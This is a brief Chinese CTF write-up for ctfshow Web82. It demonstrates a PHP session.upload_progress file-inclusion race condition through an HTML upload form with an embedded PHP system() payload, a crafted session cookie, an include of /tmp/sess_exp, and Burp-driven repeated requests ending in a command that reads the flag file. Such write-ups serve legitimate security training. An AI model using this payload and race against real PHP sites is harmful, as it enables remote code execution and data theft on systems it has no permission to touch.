文件包涵条件竞争(ctfshow82)

小春学渗透2024-07-30 23:28

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
中科固源2 小时前
面对快手式自动化突袭:如何堵住通讯协议的数字化命门?
安全·网络安全·通讯协议·模糊测试
闲人不梦卿3 小时前
网络安全技术
网络·网络安全
信安大佬4 小时前
2025鹏城杯-whiteout
网络安全
bl4ckpe4ch4 小时前
用可复现实验直观理解 CORS 与 CSRF 的区别与联系
前端·web安全·网络安全·csrf·cors
奋斗者1号5 小时前
MQTT连接失败定位步骤
开发语言·机器学习·网络安全
小快说网安6 小时前
等保测评通过后,如何持续满足安全运维要求?
运维·安全·网络安全·等保测评
mooyuan天天7 小时前
CISP-PTE 日志分析2
网络安全·cisp-pte·日志分析
Johny_Zhao8 小时前
黑客msfconsole渗透工具超详细使用说明
linux·python·网络安全·信息安全·渗透测试·云计算·系统运维·攻防演练
介一安全9 小时前
Android 安全加固工具 dpt-shell
android·安全·网络安全·逆向
Whoami!11 小时前
❿⁄₃ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击 ➱ 密码破解理论(上)
网络安全·信息安全·哈希算法·密码破解原理
热门推荐
01GitHub 镜像站点02安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)03手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!04Linux下V2Ray安装配置指南05Labelme从安装到标注:零基础完整指南06jdk21下载、安装(Windows、Linux、macOS)07GitLab 零基础入门指南:从安装到项目管理全流程08UV安装并设置国内源092025-04-03 Latex学习1——本地配置Latex + VScode环境10【踩坑笔记】50系显卡适配的 PyTorch 安装